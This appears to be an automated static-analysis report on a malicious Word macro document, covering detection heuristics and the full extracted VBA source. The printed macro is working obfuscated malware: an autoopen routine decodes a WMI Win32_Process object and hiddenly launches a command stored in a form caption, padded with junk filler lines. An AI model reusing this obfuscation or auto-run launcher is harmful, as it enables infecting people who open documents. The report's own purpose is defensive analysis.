Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5b029331d407f1db…

MALICIOUS

Office (OLE)

165.7 KB Created: 2019-10-21 06:25:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 27b44df6c4d5584543d373f80dcfac09 SHA-1: 995dc046eff99f9aa1ecbad0a2518c824cd30b78 SHA-256: 5b029331d407f1dba6eea0037de4858e9a893460cb93ca29cc36b8ef5b2ee3ae
190 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-7349618-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7349618-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Putin = CreateObject(Izgzjwshhmepq(Izgzjwshhmepq(PutinA)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24984 bytes
SHA-256: 21690747ab5aa20bf38545896d0d660759e3bfae7110ea571a993d9fe87e536c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ycgfpsbi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mxaifhwyuqm, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Geicdjevczymb, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Isukkycn, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Lasngglqpuu, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Sezdsuwlf, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Ehtcztrukr, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Xjpectblgfk, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Dpspruerlnt, 7, 7, MSForms, CommandButton"
Attribute VB_Control = "Unkavilblr, 8, 8, MSForms, CommandButton"
Attribute VB_Control = "Tgsglnkyh, 9, 9, MSForms, CommandButton"
Attribute VB_Control = "Znkweqiy, 10, 10, MSForms, CommandButton"
Attribute VB_Control = "Ioxvinwctorhy, 11, 11, MSForms, CommandButton"
Attribute VB_Control = "Zyzrobigu, 12, 12, MSForms, CommandButton"
Attribute VB_Control = "Ewlyfgpjo, 13, 13, MSForms, CommandButton"
Attribute VB_Control = "Innjecbsbdmd, 14, 14, MSForms, CommandButton"

Attribute VB_Name = "Ropoeqxttrax"
Function Putin(PutinA)
On Error Resume Next
   Rem Soap
TimeValue CStr("Chair")
Izwhdusz = CLng(Smnvffzlarc)
Xkcnyajknapzy = 130
Day Jbowuewdwds
Shubhczxbhty = CBool("Champlin, Ledner and BahringerApt. 865Southwest")
Flyvhulbz = Rnd("Stroman, Mraz and HalvorsonApt. 572East")
Hrbgfjgdp = CSng("Regional19004 Heathcote Mission, Rhodafurt, Montserrat")
Gnsvlqiuu = Hex("District1936 Rath Run, Port Diannaside, Saint Lucia")
Rem Prohaska, Dibbert and MurrayApt. 881Southeast
DateValue 793
Zrryhldiqir = Cos(Kyqvxmvrnzfld)
DateValue Rnd("2.221.84.214")
Second CLng("148.25.65.224")
MonthName Atn(Useiiusjp)
Vzgbxprs = 260
Anwhcvlrmne = "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/537.2.2 (KHTML, like Gecko) Chrome/24.0.827.0 Safari/537.2.2"
TimeValue Oxdinfsobnvr
Hour 151
Lbqtkbuufi = "Human02174 Jordan Tunnel, New Osbaldostad, Cayman Islands"
'Muller, Sporer and JastApt. 323East
Yhsduxves = CLng(493)
Set Putin = CreateObject(Izgzjwshhmepq(Izgzjwshhmepq(PutinA)))
   Rem Legacy62799 Walter Parkway, South Jerryshire, Faroe Islands
Hour CStr("Customer2250 Parisian Plains, Mikeltown, Afghanistan")
Uqsvzlvx = CBool(Tsbsuzfrgw)
Vwggzyymckld = 852
Day Ogufwtcbke
Enifexocvv = CStr("Customer0221 Nia Ports, Wuckerthaven, Sweden")
Mwzvhjgxllky = Atn("Tuna")
Zvptmcro = CSng("Car")
Ewfoofosra = Sin("Shirt")
Rem Keyboard
Hour 693
Uhuaxrat = Oct(Iextnbimbx)
TimeValue Hex("222.34.185.237")
Month CByte("218.149.124.35")
MonthName Fix(Rkdrifwrgwh)
Izleanbh = 610
Bqvrnkfzvxf = "Chips"
Second Xfiuxlcmwy
WeekdayName 556
Cxhbkahww = "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.9"
'National2229 Hane Fork, Nevabury, Mozambique
Nnihawlb = Fix(951)
End Function
Function Ifncenhvgln()
On Error Resume Next
   Rem Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/4.1; .NET CLR 1.6.65118.6)
Month Round("60.203.74.24")
Qkswojponfgto = Log(Oaayqmlg)
Iktykgyjqvj = 749
Minute Lpobaotrbj
Kfssmedoi = Atn("Sausages")
Vpcyhjxntmppi = CInt("Cheese")
Lrkwhbxsza = CLng("33.126.81.155")
Erfndfqslyp = Fix("Lead6673 Keeling Roads, Charlieshire, Djibouti")
Rem 178.14.87.119
Month 518
Dvcuvqkqa = CByte(Dmyxyxcybs)
WeekdayName CByte("186.138.98.180")
Hour CDate("Osinski IncSuite 919Southwest")
Weekday CStr(Nyljriancyoeg)
Ekvadytjqhtun = 119
Jokzpvjgshaf = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/7.0; .NET CLR 4.9.22491.4)"
TimeValue Xtqdzynfs
Day 672
Tpucxonrkoaug = "Fadel, Batz and BeerSuite 038West"
'Dynamic889 Ernesto Forges, Littlefurt, Svalbard & Jan Mayen Islands
Uedscsje = Tan(505)
   Rem 196.185.227.13
Month Hex("Soap")
Abckzljit = Sin(Brjhbdirjcong)
Lgujwmyipytc = 246
WeekdayName Vlfxoyham
Shncmowufacn = Sqr("Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/5.1; .NET CLR 4.6.96530.6)")
Mdjujibmkn = Tan("Pizza")
Qssmkuvqee = CStr("Brekke, Lang and WillApt. 563Northwest")
Ckxhqhsxv = CLng("Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/538.0.1 (KHTML, like Gecko) Chrome/25.0.831.0 Safari/538.0.1")
Rem Mouse
Day 52
Uygdrrfx = CInt(Dxecspisth)
WeekdayName Oct("Koch, Powlowski and CassinApt. 093South")
Weekday Hex("Shoes")
MonthName Oct(Erykuwcutneq)
Erdzyhltzmt = 387
Rkfbetdtoegxj = "National538 Tyra Street, Gastonbury, Finland"
Year Sptofdlro
Month 729
Afkslroxk = "Principal28437 Quitzon Station, Jakubowskitown, Wallis and Futuna"
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_1)  AppleWebKit/532.0.1 (KHTML, like Gecko) Chrome/19.0.865.0 Safari/532.0.1
Mzwtvpmxbpn = Log(197)
   Rem Rosenbaum IncSuite 677West
Second CBool("Corporate506 Hegmann Fords, Walshton, Honduras")
Ojomauyy = CSng(Dxsywwlftexv)
Pkgyzqjdp = 124
DateValue Wknnfewtmaj
Rskwrecslgxq = CStr("138.210.145.234")
Zzjzieja = CStr("229.107.61.242")
Roabbmgffnggf = CByte("Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)")
Klwkdqxrdw = CStr("Schneider LLCSuite 422East")
Rem Mozilla/5.0 (Windows NT 6.2; Trident/7.0; Touch; rv:11.0) like Gecko
DateValue 691
Bbzjrgne = Atn(Arzaskat)
WeekdayName Int("Mouse")
TimeValue Atn("129.66.36.68")
Month Sin(Wnxtmpihuwwe)
Fdgdpzsijg = 980
Ldymrkdag = "Weber - NikolausSuite 725West"
Minute Gxbygkfh
Year 995
Puoewdtbne = "179.41.167.233"
'Gloves
Geeiifmbh = Tan(233)
Set Kabpdukfzjhrc = Putin("iwhiwhwiniwhiwhiwhmgmiwhtsiwhiwhiwh:Winiwhiwhiwh32_Proiwhiwhiwhcessiwhiwh")
   Rem 176.133.6.122
Day Tan("Hansen IncSuite 353South")
Yboqdubuccbxl = Sgn(Wnzrxqdwilzy)
Rxjcjqupopzil = 357
Month Bvgilmie
Iuffeevuuler = CInt("Gloves")
Kxgzjroe = CDate("Central8791 Angelica Tunnel, West Amina, French Polynesia")
Gpsqvnjtukbv = CDate("114.255.137.31")
Jlenqhxjae = CDbl("Hat")
Rem Tuna
Second 765
Fjuwddjlypl = CSng(Hckwkbpiwpynb)
Year Log("Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/531.1.2 (KHTML, like Gecko) Chrome/13.0.834.0 Safari/531.1.2")
Second CDbl("82.102.65.100")
DateValue Oct(Xwoosiha)
Gxmdluzzojfmm = 96
Ieitvjbp = "Table"
Month Bawmrzblydd
Month 493
Lvzondykk = "Swift, Veum and JastApt. 705Southeast"
'Shirt
Jdzgdofhgp = Sin(888)
   Rem Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/7.1)
Minute CStr("Internal56974 Lori Estates, Merrittland, Anguilla")
Piawfkjf = Round(Jnprzjvvh)
Arcopvesl = 398
Second Wtofcmdjmu
Jygeppdorxsp = Int("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.0; Trident/3.1; .NET CLR 3.4.66933.7)")
Hppfnggyqvdug = Cos("Tuna")
Xbnyztqjroch = CStr("Regional4635 Keanu Ways, Lake Raymundoview, Slovenia")
Zbyoefnughvm = Oct("Gloves")
Rem Direct508 Barton Knoll, Gilbertton, Central African Republic
Month 105
Kauivwtvf = CLng(Eqfxqkytdru)
Minute CLng("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/531.1.2 (KHTML, like Gecko) Chrome/24.0.801.0 Safari/531.1.2")
DateValue Oct("10.185.182.90")
Year Sqr(Cddcugcni)
Ruumpadvixaoi = 896
Wxshqqwogrs = "71.226.85.92"
MonthName Yodvhggw
WeekdayName 766
Dcnywibovg = "79.144.242.62"
'Dynamic325 Lawrence Way, Millerburgh, Liechtenstein
Fubsivfnuw = Rnd(745)
Set Mouexcal = Putin(Ycgfpsbi.Ehtcztrukr.Caption)
   Rem Chair
Second Rnd("Pizza")
Psvahsesr = Log(Qrkgyayjxz)
Ywwfuvwhn = 767
WeekdayName Okitztnxfmye
Fnoenchrlx = Fix("Funk GroupApt. 780East")
Nkxvxxywww = Sin("Chips")
Zpjbtuzrl = Sqr("Bacon")
Iiczpnxzlpo = CStr("Chicken")
Rem Computer
WeekdayName 524
Akobgonj = Cos(Fxsfyqxmz)
Weekday CStr("Rosenbaum - KreigerApt. 819Northwest")
Month Round("Bernhard - HaagApt. 261West")
WeekdayName Sgn(Omuxijyweskjg)
Fxlxhflbxb = 709
Zincpohmx = "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.2.0 (KHTML, like Gecko) Chrome/15.0.845.0 Safari/534.2.0"
Second Xfpmsovo
WeekdayName 685
Pkzbblqdl = "Davis - HermannSuite 193Southwest"
'Human1534 Laurie Springs, Port Jewelside, Belarus
Kbznqpuvzolm = CDate(700)
Rengmxxmujw = Rengmxxmujw
Mouexcal.ShowWindow = wdXMLNodeLevelRow - 2#
   Rem Mozilla/5.0 (Windows NT 6.2; Win64; rv:5.8) Gecko/20100101 Firefox/5.8.4
Day Int("Hills - SwaniawskiApt. 951East")
Jykuabje = Sqr(Murfsjsnxljp)
Bjshkmlljajtd = 970
Minute Zdbqobkrmgek
Trtektrjcuwi = CSng("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5)  AppleWebKit/534.1.2 (KHTML, like Gecko) Chrome/22.0.822.0 Safari/534.1.2")
Rwygltxiiz = Cos("Ball")
Qrgbgcyuqipot = CInt("Chief159 Vallie Light, North Sventon, Afghanistan")
Pbhufaaa = CDbl("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/536.2.0 (KHTML, like Gecko) Chrome/19.0.817.0 Safari/536.2.0")
Rem Senior34425 Boehm Dale, Baileymouth, Costa Rica
DateValue 768
Yzttljuym = CByte(Dantkgtigjnxq)
DateValue CInt("Sausages")
Month Atn("Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/538.0.0 (KHTML, like Gecko) Chrome/22.0.840.0 Safari/538.0.0")
TimeValue CStr(Beaxqrqui)
Afyvqgkdm = 591
Bvtgrjxlbdle = "239.190.148.205"
Day Yoningepfgo
Minute 437
Tgnmvghdee = "Ankunding and SonsSuite 481Southwest"
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:9.5) Gecko/20100101 Firefox/9.5.6
Gwxbaobqfrsxu = CInt(584)
Fzjkuvka = Izgzjwshhmepq(Izgzjwshhmepq(Ycgfpsbi.Unkavilblr.Caption))
   Rem 14.9.31.136
Minute CDate("Grant, Hermiston and BatzApt. 109Northwest")
Cjufulbn = Tan(Ojeseato)
Tsuwodwjjwlc = 52
Month Iayyzaqlaml
Qaklqonkkox = Cos("Computer")
Pretqlqnjeb = Sin("Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/536.2.1 (KHTML, like Gecko) Chrome/19.0.858.0 Safari/536.2.1")
Hbhrilcofjy = CStr("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.1) Gecko/20100101 Firefox/5.1.8")
Ofgymbhikzhg = Tan("Shirt")
Rem Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.2.1 (KHTML, like Gecko) Chrome/33.0.865.0 Safari/533.2.1
Second 822
Vagwjqbglctfm = CDate(Jifivxkh)
Minute CLng("Bike")
DateValue Hex("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.0; Trident/6.1)")
TimeValue CStr(Angxcakmlgny)
Usiudegosga = 520
Yacltuej = "Anderson, Cormier and LangApt. 842Northeast"
TimeValue Ijcjsbiolvqn
DateValue 496
Qehllvawmyl = "197.43.132.129"
'105.185.176.142
Vueigrxzl = CBool(381)
   Rem 217.194.64.201
MonthName CDate("Chicken")
Bqfoqfol = Rnd(Klwvltoukp)
Iebqvmjrja = 789
Year Xzgnethafvi
Dzvbdqvltham = Hex("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/4.0; .NET CLR 4.3.97457.5)")
Bchzjhgymm = Cos("Mozilla/5.0 (Windows NT 5.1; WOW64; rv:7.8) Gecko/20100101 Firefox/7.8.6")
Rhqdnwqvsmn = CInt("Global6173 Meagan Forks, New Dejuanland, Greece")
Kifergadj = CLng("Table")
Rem 249.19.57.48
Weekday 988
Xvydoenianznv = Tan(Dwfrportyzbu)
Day CByte("Mouse")
Day Rnd("192.238.217.139")
Year Tan(Amhcrfrxn)
Yfoslukowce = 539
Qkgcadnktcab = "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.1.2 (KHTML, like Gecko) Chrome/34.0.841.0 Safari/533.1.2"
DateValue Dkdfjyeqjd
Second 10
Frfydwnplhz = "41.114.35.100"
'103.81.167.249
Jtcfcortigdtw = CInt(44)
Yyiqmjcfv = Kabpdukfzjhrc _
. _
 _
 _
 _
 _
 _
 _
 _
 Create _
 _
 _
 _
 _
(Fzjkuvka, Steuvhelalh, Mouexcal, Ukbvcwlp)
   Rem 12.126.72.91
TimeValue CLng("65.160.8.204")
Zthupwliwq = CDate(Tungfquwdg)
Lhpsimsno = 68
Day Wvelschdifz
Oyzltbgte = Round("224.149.82.66")
Igszjywvzd = Hex("Schaden and SonsSuite 566East")
Aectwdhalv = Round("Dynamic98256 Schulist Stream, Leuschkeville, Philippines")
Jngumnyst = CSng("Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.2.0 (KHTML, like Gecko) Chrome/35.0.859.0 Safari/532.2.0")
Rem Mozilla/5.0 (Windows NT 6.2; WOW64; rv:7.3) Gecko/20100101 Firefox/7.3.1
Month 788
Lkhtkjdl = CByte(Nygrhkqxbxmxo)
Weekday CInt("Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)")
Hour CSng("165.38.129.76")
Day CInt(Rbjmfxrebqjoj)
Ijggvoadfdi = 282
Yqovrxshuzxa = "Chief149 Armani Trace, Tayashire, Chile"
TimeValue Faxvgakocqht
Hour 375
Yejwczgkcnxm = "Walter - GoldnerSuite 678Southeast"
'247.52.32.220
Okigzuuchh = Hex(548)
   Rem Tuna
Weekday Sgn("25.26.164.82")
Rnklnaomwuynf = Atn(Uwrbknkk)
Hyqvkxiut = 149
Weekday Eudyexbcumws
Wnuhlgcfffbyr = Hex("93.46.40.135")
Qslikqcodfqih = CDate("Chicken")
Lgtynjnniqpz = CBool("Central37143 Eda Forges, Sanfordmouth, Ethiopia")
Xgfpgdtljmguz = CBool("Bacon")
Rem Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.1.2 (KHTML, like Gecko) Chrome/16.0.842.0 Safari/536.1.2
TimeValue 83
Vxuunuuf = Cos(Mdfdruqnqgzkt)
Second CInt("Beier, Runolfsson and MullerApt. 786Southeast")
Minute CStr("Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/534.0.1 (KHTML, like Gecko) Chrome/18.0.810.0 Safari/534.0.1")
DateValue CInt(Zawgrsjwl)
Vfbdcalptaoh = 350
Pgjlcketnnuy = "Investor537 Kennedy Islands, Ahmedmouth, Estonia"
Year Hchurzzl
Month 340
Eyzdhgkseob = "Bernier GroupSuite 161Southeast"
'Legacy47991 Borer Stravenue, Bentonshire, New Zealand
Libocrni = Log(661)
End Function


Attribute VB_Name = "Linyugpogwsq"
Function Wvscdokltqd()
On Error Resume Next
   Rem Car
TimeValue Cos("Feil, Kiehn and BoyleSuite 349North")
Uujyuymoh = Cos(Jecwmkkps)
Lfuetoxv = 199
Weekday Nsbduubaba
Uvgawogiewa = Sqr("Cheese")
Eepexrmaw = Sin("Lang GroupApt. 277Northwest")
Asrpjoqgzv = Log("Human372 Legros Crossing, New Joan, United Arab Emirates")
Xtsiowerrkuqq = Log("Kessler LLCSuite 360North")
Rem 123.126.109.45
DateValue 758
Eirqxzuzdxqyp = Rnd(Rntfrlfjxdsf)
TimeValue Sqr("Greenfelder, Metz and GusikowskiApt. 449South")
DateValue CBool("245.149.76.7")
Day Tan(Xazyslyieny)
Olxxplxthxkt = 306
Ztnfuzjfwrawu = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.0; Trident/3.0; .NET CLR 4.0.16192.3)"
WeekdayName Iggorqyzfc
WeekdayName 33
Wqdoehnzorhee = "Investor63568 Lockman Isle, Klington, Trinidad and Tobago"
'21.147.145.13
Ogxsqbjyre = Oct(762)
   Rem Mozilla/5.0 (Windows NT 5.1; rv:14.6) Gecko/20100101 Firefox/14.6.3
Year CDate("Bogan - MacGyverApt. 259Northeast")
Iebfgukkfwwv = Fix(Dcihpyxcmb)
Krmepcnn = 63
Month Zwrfxktmotxe
Kjilvgrz = CByte("Towels")
Jtxbguhc = Sin("District404 Ward Vista, Kingshire, Congo")
Dmqkbnjans = Int("Future72733 Effertz Drive, Gibsonberg, Antigua and Barbuda")
Njugucrda = Oct("Maggio - FisherSuite 536South")
Rem Legacy937 Gust Mountains, East Richard, Macao
Minute 130
Owdmsftm = CBool(Szxtyjhw)
DateValue Tan("Legacy78456 Runte Gateway, Glennaport, Thailand")
Second Tan("186.232.109.218")
Year Hex(Awcgogazfk)
Ejbnybrvtg = 201
Ukxmwsjh = "154.184.136.121"
MonthName Cstwyletglg
TimeValue 621
Nrklgfwsulam = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5)  AppleWebKit/533.2.2 (KHTML, like Gecko) Chrome/14.0.841.0 Safari/533.2.2"
'Schuster - FarrellSuite 770Southwest
Ndnapbrhju = CLng(998)
End Function
Sub autoopen()
On Error Resume Next
   Rem Goodwin - TillmanApt. 500North
DateValue Round("153.216.249.87")
Drfgdnsuyh = CSng(Yzsawdvixmi)
Knfcyzlsbb = 909
MonthName Wkiefdzuy
Tfhvceoqjlu = Atn("Bike")
Nrzhwvwyctatn = CInt("Mozilla/5.0 (Windows NT 6.3; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.8")
Jiznpzmxrejn = Round("Bacon")
Gvbqirodsy = CInt("Mozilla/5.0 (Windows NT 6.3; Win64; rv:11.3) Gecko/20100101 Firefox/11.3.8")
Rem Nicolas GroupSuite 225North
Day 612
Pqlgboawhalge = CDate(Uicmhjnv)
Year Rnd("Regional671 Kirlin Run, Larryborough, Tokelau")
Second Tan("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_3 rv:3.0; RU) AppleWebKit/535.0.1 (KHTML, like Gecko) Version/5.1.7 Safari/535.0.1")
Minute CBool(Dendfqbkqjvlk)
Npcgjvliquvp = 780
Ocuniykntcjk = "187.86.140.141"
Day Qejxzrutkpo
DateValue 27
Vwjjbqqbhbxc = "Hat"
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_8 rv:2.0; CS) AppleWebKit/531.1.0 (KHTML, like Gecko) Version/7.0.4 Safari/531.1.0
Awawzzxrlk = CBool(801)
   Rem Greenfelder GroupApt. 226Northwest
Weekday Sgn("Pizza")
Hnyvljlcgjjh = Round(Zkpiijjl)
Lkebbphdgpamd = 576
TimeValue Wmeearfo
Viphvjvyck = Tan("Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/5.1)")
Kaqcfagcm = Sin("Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.0.1 (KHTML, like Gecko) Chrome/27.0.831.0 Safari/536.0.1")
Glxfgoefwdo = CInt("Chicken")
Rwlffnbpa = Sgn("Internal92085 Orval Coves, East Shannahaven, Bermuda")
Rem Towels
Weekday 214
Doxlfhyz = Round(Iwydpkxfebvu)
WeekdayName Rnd("Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko")
Year Sgn("184.35.33.179")
Day CBool(Jpbxyeaftv)
Qsaofpqpiznb = 887
Ekwqgjfm = "Central9583 Addie Place, Delbertstad, Argentina"
TimeValue Gaalscccbxt
Day 218
Qwfdtcjcz = "59.11.83.193"
'107.47.230.194
Aqjdosmerkhe = Oct(901)
Ifncenhvgln
   Rem Product1150 Domenica Lodge, North Madeline, Algeria
Year Cos("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5.4; rv:14.9) Gecko/20100101 Firefox/14.9.1")
Wighdbkovjg = Rnd(Zgicglgtbsi)
Dwjuvyzxpo = 139
Weekday Dncrayxf
Jgyoxpuvpxss = Round("Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/5.0; .NET CLR 3.9.82229.7)")
Ebohpqjsmzd = Fix("Tuna")
Cbulipln = Rnd("Chief785 Jarrett Land, Langworthbury, Cyprus")
Gbkduyxkkpomy = CDate("Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/537.1.0 (KHTML, like Gecko) Chrome/35.0.806.0 Safari/537.1.0")
Rem Bike
Weekday 533
Qeiquylzlrt = CStr(Kdmacfigen)
WeekdayName CLng("Bashirian GroupSuite 653West")
Month CLng("Product6623 Feest Crossroad, Titusbury, Madagascar")
MonthName CDate(Ppsioqclvskc)
Xubyladka = 43
Nktbjlqs = "Internal95088 Bosco Gardens, South Elisa, New Zealand"
Day Jtrxbrjrs
Second 383
Etinfgcpqe = "Fish"
'Grimes IncSuite 248South
Fafijmgtkz = CDbl(65)
   Rem Reinger GroupApt. 932East
MonthName Hex("Prosacco, Dicki and KesslerApt. 641West")
Aswyegcxkk = CDbl(Ogtyailhohk)
Gpoqmtar = 603
Day Imbrqirbyeq
Lyjlhfysi = Sgn("Weber, Legros and BarrowsSuite 630Northeast")
Xqngyqtwaplmy = CInt("Harris GroupSuite 245Southwest")
Yxglvkokdsci = Round("Cheese")
Pyapeuzukc = CDbl("Pants")
Rem Lesch - MurazikSuite 675Southeast
Hour 722
Trpzlkumga = Round(Bnigkovhbkkql)
Day Rnd("27.50.64.89")
WeekdayName CInt("Bacon")
TimeValue CBool(Xvemddkqwudg)
Ffondnrlsjw = 63
Jjgyonqx = "13.0.140.128"
DateValue Ohtqwlmh
DateValue 656
Tvfwdhkd = "86.72.97.23"
'116.85.104.9
Uqwcbhqv = Int(547)
End Sub
Function Izgzjwshhmepq(Jmexdjcneywi)
On Error Resume Next
   Rem Human591 Owen Underpass, Violetteton, Ethiopia
TimeValue CByte("Mozilla/5.0 (Windows NT 5.3; Win64; rv:7.8) Gecko/20100101 Firefox/7.8.2")
Blpqhznxiise = Cos(Diffbprfd)
Aykgedfz = 29
WeekdayName Unzdzphzs
Gkaqnlvecwiz = Int("130.185.229.188")
Bcqdfnfda = Sqr("Human1267 Dorcas Brooks, New Giovani, Germany")
Gbbzkgktlunk = Sgn("75.186.110.182")
Rkvxjmomwyn = CStr("District1224 Icie Well, North Floyfurt, Aruba")
Rem 173.225.180.221
Month 919
Mjmdkrvhjtesp = CStr(Bnosamnck)
WeekdayName CStr("Skiles - MillerSuite 861Southwest")
MonthName CDate("Tuna")
TimeValue Rnd(Wgufdmtkyky)
Sujirqeu = 242
Kjkvqjzgcx = "Veum - LindgrenSuite 572Southeast"
MonthName Pmdqsyeyudvl
TimeValue 588
Celtbwhxk = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/537.1.0 (KHTML, like Gecko) Chrome/31.0.810.0 Safari/537.1.0"
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/5.1; .NET CLR 4.8.84669.2)
Rdaydvujyfwe = CLng(627)
   Rem Tuna
Second CBool("Soap")
Jvbnfywaisjxz = Oct(Pevazriatndh)
Wordnruuv = 47
Minute Gfurmmvguaiqc
Bvhzbqpvm = Sin("Product5553 Hagenes Ville, West Coopershire, Cook Islands")
Tlgbujbbslnj = Round("Bike")
Hblenypw = CInt("212.203.17.189")
Zmvrhqkhous = Fix("Senior97694 Misty Loop, Lexieton, Kenya")
Rem 148.211.43.126
WeekdayName 61
Tfzoaowo = Tan(Yupeqzfc)
MonthName Hex("Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.8) Gecko/20100101 Firefox/5.8.4")
MonthName Cos("Tuna")
Minute Log(Rcioktbbf)
Ixaszojphj = 128
Mwxsmtiisve = "Parker - BeahanApt. 284Northeast"
WeekdayName Xkegmviqoqw
Weekday 199
Rlvnpwppvs = "Hintz, Brown and SpencerApt. 896Southeast"
'Investor63310 Linda Knolls, Romaguerachester, Jamaica
Phxmumtr = Sqr(330)
Zpxwzlywn = Jmexdjcneywi
   Rem 59.80.11.239
TimeValue Int("223.110.97.184")
Wcbvhoctlor = CDate(Kcotlcrwfiwp)
Lzcgiexstzqth = 142
Weekday Tqpjqacqeg
Trtfgorquiij = Rnd("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.0; Trident/6.1; .NET CLR 1.1.58367.7)")
Rjodrvkmlsgf = CInt("122.29.38.9")
Jjyzmkdazukeq = Tan("70.99.187.224")
Kigqvitbboa = CBool("International6679 Maiya Ramp, Kiehnberg, Belize")
Rem 136.151.246.243
Day 962
Gbybnuhkk = Fix(Jrqjutnfuxajz)
Weekday CInt("O'Connell - MedhurstApt. 072Southwest")
Day Log("Principal65012 Magali Manors, Lake Gilbert, Armenia")
TimeValue Log(Opixllbxu)
Iqvieaajgdrjg = 975
Voifsylh = "10.236.20.110"
Hour Cnwkhtwmykw
Second 393
Tajpicwgbo = "Lockman and SonsSuite 503Southeast"
'Grady and SonsApt. 997Northwest
Npofxxjqrbm = Oct(818)
   Rem 126.135.201.86
Month CInt("Roberts LLCApt. 334East")
Nsjlnqznmd = Cos(Tmgrkecquwa)
Gtgooxbo = 225
Second Shitgtofqatg
Mfdbjorr = Rnd("53.154.141.137")
Gxszxflamt = Sqr("Sausages")
Clwwfqkqhz = Sin("Carter and SonsSuite 569South")
Bjuzescap = Int("177.156.57.193")
Rem Grant, Little and BernierSuite 551Northwest
MonthName 455
Japikpsubn = CBool(Sfmiahbd)
Month Sin("Corporate615 Cyrus Ferry, Lake Mikel, Kyrgyz Republic")
Second Sin("175.212.83.36")
Year Tan(Nyollvuqnufyn)
Iaaofwrygcu = 663
Bsntgknruz = "244.236.217.0"
Month Zlaixurqsshap
DateValue 595
Vzhircko = "Collier - KulasApt. 509North"
'Hat
